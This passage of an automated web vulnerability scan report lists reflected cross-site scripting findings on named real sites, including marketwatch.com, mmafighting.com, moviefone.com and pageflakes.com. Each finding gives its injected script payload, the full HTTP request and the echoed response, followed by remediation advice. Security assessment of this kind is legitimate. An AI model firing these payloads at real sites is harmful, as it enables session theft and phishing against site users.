Host:   http://www.marketwatch.com
Path:   /News/Story/Story.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d8f8'%3bc73e17508a0 was submitted in the REST URL parameter 1. This input was echoed as 1d8f8';c73e17508a0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /News1d8f8'%3bc73e17508a0/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp05
Date: Thu, 05 May 2011 10:58:45 GMT
Content-Length: 50913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/News1d8f8';c73e17508a0/Story/Story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

2.33. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /News/Story/Story.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e95c5'%3b27c78d71732 was submitted in the REST URL parameter 2. This input was echoed as e95c5';27c78d71732 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /News/Storye95c5'%3b27c78d71732/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp04
Date: Thu, 05 May 2011 10:58:45 GMT
Content-Length: 50893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/News/Storye95c5';27c78d71732/Story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

2.34. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd126"-alert(1)-"900ecbe9de5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cd126"-alert(1)-"900ecbe9de5=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999932
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 64916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
="sportsillustrated.cnn.com,golf.com,fannation.com,sportsfanlive.com,sbnation.com";
s_265.mmxgo = true;
s_265.prop1="MMA";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://www.mmafighting.com/?cd126"-alert(1)-"900ecbe9de5=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.35. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a508"><script>alert(1)</script>5be8d4657ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6a508"><script>alert(1)</script>5be8d4657ca=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999950
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 64989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/?6a508"><script>alert(1)</script>5be8d4657ca=1" />
...[SNIP]...

2.36. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 917bd"><script>alert(1)</script>fd80077afb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?917bd"><script>alert(1)</script>fd80077afb4=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:44 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:43 GMT; path=/
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?917bd"><script>alert(1)</script>fd80077afb4=1" />
...[SNIP]...

2.37. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53f06"-alert(1)-"1a6d26d7f09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?53f06"-alert(1)-"1a6d26d7f09=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:44 GMT; path=/
Keep-Alive: timeout=5, max=999988
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
mmxgo = true;
s_265.prop1="MMA";
s_265.prop2="Article";
s_265.prop9="bsd:19930968";
s_265.prop12="http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?53f06"-alert(1)-"1a6d26d7f09=1";
s_265.prop17="sources-fedor-hendo-fight-could-be-announced-within-24-72-hours";
s_265.prop19="mike-chiappetta";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_cod
...[SNIP]...

2.38. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The value of the icid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa5f5"><script>alert(1)</script>b5c0de1ee4a was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545fa5f5"><script>alert(1)</script>b5c0de1ee4a HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:28 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:28 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:27 GMT; path=/
Content-Type: text/html
Content-Length: 63630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545fa5f5"><script>alert(1)</script>b5c0de1ee4a" />
...[SNIP]...

2.39. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The value of the icid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2f3c"-alert(1)-"56010fc58d0 was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545a2f3c"-alert(1)-"56010fc58d0 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:28 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:28 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:27 GMT; path=/
Content-Type: text/html
Content-Length: 63555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
cle";
s_265.prop9="bsd:19931900";
s_265.prop12="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545a2f3c"-alert(1)-"56010fc58d0";
s_265.prop17="former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11";
s_265.prop19="ariel-helwani";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)do
...[SNIP]...

2.40. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae19"><script>alert(1)</script>22fc5ab7398 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&fae19"><script>alert(1)</script>22fc5ab7398=1 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:29 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:29 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:28 GMT; path=/
Content-Type: text/html
Content-Length: 63649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&fae19"><script>alert(1)</script>22fc5ab7398=1" />
...[SNIP]...

2.41. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7c4"-alert(1)-"b34755837c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&7b7c4"-alert(1)-"b34755837c4=1 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:30 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:30 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:29 GMT; path=/
Content-Type: text/html
Content-Length: 63576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
le";
s_265.prop9="bsd:19931900";
s_265.prop12="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&7b7c4"-alert(1)-"b34755837c4=1";
s_265.prop17="former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11";
s_265.prop19="ariel-helwani";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)
...[SNIP]...

2.42. http://www.moviefone.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.moviefone.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4776d"><script>alert(1)</script>59ea0380dd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4776d"><script>alert(1)</script>59ea0380dd4=1 HTTP/1.1
Host: www.moviefone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:50 GMT
Server: Apache/2.2
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:49 GMT; path=/; domain=.moviefone.com
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:49 GMT; path=/; domain=.moviefone.com
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:50 GMT; path=/
Keep-Alive: timeout=5, max=999969
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 109015


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="eng" xmlns:og="http://openg
...[SNIP]...
<link rel="canonical" href="http://www.moviefone.com/?4776d"><script>alert(1)</script>59ea0380dd4=1"/>
...[SNIP]...

2.43. http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pageflakes.com
Path:   /subscribe.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e187'-alert(1)-'e1daaea1081 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /subscribe.aspx7e187'-alert(1)-'e1daaea1081 HTTP/1.1
Host: www.pageflakes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 11:16:08 GMT
Server: Microsoft-IIS/6.0
From: web11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: t=; path=/
Set-Cookie: .PAGEFLAKESANON=00AC81F260BA9A6D5FA9BF2E0A5F34B290777F13E4510D1166BCE4233715DDEC395F69E8143FCA0F905E564697A39C5855E5440A009381B14F7875F0917C6901D8FE5AE37B98CA6E21AAD688744FF342303E26421E926E5FA383B0022C4C45AF471CF31D7A9D60D5B866965A7C42DDCA932D74F3CA2E00A36A7F9949B4A359D81D6DCDB425DF75620502301B6EF64F4D920D4140F5819ED98494DEE07ECC46C9; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 14376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript" id="StartupJSON">
var __getJsonQueryString = '?userName=subscribe.aspx7e187'-alert(1)-'e1daaea1081&r=634401657685468750';
document.write('<' + 'script type="text/javascript" id="GetJSON" src="/GetJSON.ashx' + __getJsonQueryString + '">
...[SNIP]...

2.44. http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pageflakes.com
Path:   /subscribe.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ee6f</script><script>alert(1)</script>846c743547c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /subscribe.aspx?8ee6f</script><script>alert(1)</script>846c743547c=1 HTTP/1.1
Host: www.pageflakes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 11:16:05 GMT
Server: Microsoft-IIS/6.0
From: web11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: t=; path=/
Set-Cookie: .PAGEFLAKESANON=09FEB47CFC6C6A3A9CA82F8313EDF2FE88BD584DCED8EA19F6FD5A6B17B4D3C5BFF448D5D70CC1BF473FFFE48C5DBACF66A47473612D3815F39076794F7B12ACF3C8D603D3511D39B29AD35BD13D362716DCA879751F283A6D1327219E1B538164FF4EA0D7830D9FB100B88E01C8BDB5DB7CF2F4D2637593CD2A55D43ECD5000BA7FB7D32E5787A99668E771D32E757968FCD8E1FC9BF5EEEC2F1574D9F16181; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 986


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Add feed
...[SNIP]...
document.referrer;
}
else
{
//I clicked the "add to pageflakes link". Please add this feed in my pageflakes page
var redirectUrl = 'subscribe2.aspx?8ee6f</script><script>alert(1)</script>846c743547c=1';
document.location.href="#marker";
document.location.href= redirectUrl;
}
</script>
...[SNIP]...

2.45. http://www.popeater.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popeater.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d2e1"-alert(1)-"80c66c7340 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?6d2e1"-alert(1)-"80c66c7340=1 HTTP/1.1
Host: www.popeater.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:56 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:56 GMT; path=/
Keep-Alive: timeout=5, max=999981
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 60861

